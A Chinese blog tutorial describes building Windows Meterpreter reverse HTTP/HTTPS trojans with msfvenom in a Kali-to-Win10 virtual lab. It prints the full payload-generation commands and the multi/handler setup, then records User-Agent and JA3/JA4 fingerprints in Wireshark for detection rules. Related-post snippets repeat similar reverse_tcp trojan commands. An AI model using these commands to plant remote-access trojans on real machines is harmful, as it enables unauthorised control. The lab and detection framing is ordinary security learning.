如何使用kali中msfconsole软件生成木马(shell和meterpreter类型)投放至本机进行控制???超级详细!!!

已于 2024-07-21 20:01:47 修改
阅读量692 收藏 2
点赞数 2
文章标签: linux 运维 服务器
于 2024-05-05 21:55:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77578012/article/details/137792918
版权

一、准备工作

作者本人是一台win10和kali虚拟机

1.调制同一网段

我们把它均放在自定义方式中的VMnet8中

对win10

对kali(由于作者本身虚拟机中kali界面太小所以使用真实机通过ssh服务进行连接演示,若大家有需求可以出一篇如何ssh连接kali)

二、操作阶段

1.对kali

(1)制作木马

msfconsole

进行msf6模式

http后门: 

msfvenom -p windows/x64/meterpreter/reverse_http lhost=192.168.13.135 lport=8899 -f exe -o 8899.exe

https后门:

 msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.13.135 lport=9988 -f exe -o 9988.exe

(2)使用exploit/multi/handler模块进行入侵

http:

并且使用options命令查看所需设置的内容,为本机ip:192.168.13.135和监听端口port:8899

https:(将lport改成9988即可)

设置payload

set payload windows/x64/meterpreter/reverse_http

set payload windows/x64/meterpreter/reverse_https(后续监听https时改变)

2.对win10

将两个木马放进win10

3.入侵

(1)对http

在入侵前先开启我们的抓包软件wireshark监听vmnet8网卡

(此处包为ssh服务所发忽略我们关注192.168.13.135与192.168.13.136的通信)

kali先执行run操作,win10点击8899.exe

成功后抓包

抓包后发现user-agent一致所以可以作为强规则写入(user-agent类似mac地址,是电脑的唯一标识,意味着拒绝此u

ser-agent的通信)

(2)https

修改对应参数

启动

成功后抓包

记录ja3和ja4值(client端由于使用者不同大家也各不相同根据自己的而改变)

cen难取名
关注
msfmsfvenom的使用使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 4035
msfvenom的使用
msfconsole制作后台木马获取靶机shell
weixin_41038905的博客
03-20 2505
利用kali 制作木马 root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=***.***.*.*** LPORT=**** -f exe -o /root/test.exe 生成一个木马程序test.exe,没有添加任何免杀,很容易被安全软件检测出,这里先介绍一下...
如何使用kali来入侵(渗透)一台windows
dzqxwzoe的博客
08-27 1306
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
msfconsole之制作windows木马并成功获取shell(反向payload)
2201_75387456的博客
05-27 634
相关命令:msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.5.129 LPORT=7680 -f exe > win012.exe。set PAYLOAD windows/meterpreter/reverse_tcp //和上面msfvenom使用 的payload相同。set lhost 192.168.5.129 //kali的ip。需要注意这里的lhost填写的是kali的ip。3.进入msfconsole设置。
msfconsole之制作windows木马并成功获取shell(正向payload)
2201_75387456的博客
05-27 886
还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。set payload windows/x64/meterpreter/bind_tcp //生成exe时相同的协议。端⼝启⽤监听后,只会接收⼀次数据,⽆论成功或者失败,它 都不会再监听了!将生成的文件在靶机打开,利用netstat -ano查看打开的端口。
msfconsole之制作windows木马并成功获取shell
qq_56228347的博客
11-22 3700
msfconsole制作windows木马并上线获取控制权限
利用msfvenom制作windows木马及免杀马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马msfvenom -a x86 --platform window...
kali linux捉肉鸡教程,使用KaliMetasploit生成木马控制Windows系统
weixin_42309178的博客
05-02 1523
一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。其Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsoleMSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。二、步骤:Step1:生成木马msfvenommsfve...
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2472
使用msfvenom生成木马控制手机
kali-TheFatRat木马生成工具安装及简单使用
qq_35258210的博客
02-10 1万+
kali终端下载 命令:git clone https://github.com/Screetsec/TheFatRat.git 推荐使用浏览器github上下载,比命令下载要快 浏览器下载:https://github.com/Screetsec/TheFatRat.git 下载完后将压缩包放到kali系统里 使用终端解压文件 命令:unzip 接下来要使用到的是这三个工具,我们想要使用先给它们添加可执行权限 命令:chmod +x setup.sh powerfull.s
【网络安全】 MSF生成木马教程,网络安全框架
2401_84240742的博客
04-11 1359
3、免杀加壳:本例用的是 Themida。
kali msfvenom生成木马
qq_33391644的博客
02-06 6194
kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。 这里就只是记录下生成一个程序的过程。 msfvenom msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 1.首先还是得打开postgresqlro...
转: kali msfvenom生成木马
weixin_30726161的博客
04-23 497
kali msfvenom生成木马 转:https://blog.csdn.net/qq_33391644/article/details/79266724 msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 1.让我们正式开始吧,因为我的目标平台是一个win7 64 位,所以要找一个相...
kali-msfvenom生成远控木马
Ryongao
01-16 955
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
kali使用msfvenom生产木马,在使用msfconsole进行控制
qq_45031509的博客
07-13 947
kali使用msfvenom生产木马,在使用msfconsole进行控制
使用kali渗透工具msfvenom生成远控木马
m0_74981852的博客
06-04 2782
在杀毒软件可以找回文件并信任改文件。右键复制到自己的电脑的一个位置,注意。1.打开kali终端>输入。2.1查看生成的后门文件。6.对目标主机进行攻击。运行之后,去目标主机。
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程
2401_84263434的博客
05-02 1485
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:新手阶段一般都用windows
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4617
利用kalimsf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
msfvenom生成远控木马
Leiyinghui的博客
06-26 1003
用于生成各种类型的恶意软件payload,可以生成针对不同操作系统和应用程序的恶意代码,如木马、后门、恶意软件等,msfvenom在目标机上执行后门,在本地监听上线。查看可执行的操作,根据描述内容选择所需的命令进行操作。
kali机怎么对浏览器打开的网页进行抓包呀!就是在网页进行
最新发布
09-07
Kali Linux,可以使用多种工具对浏览器打开的网页进行抓包,其一个常用的方法是使用Wireshark。Wireshark是一个图形界面的网络协议分析工具,可以捕获网络接口上的数据包,并允许你分析这些数据包。以下是使用...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值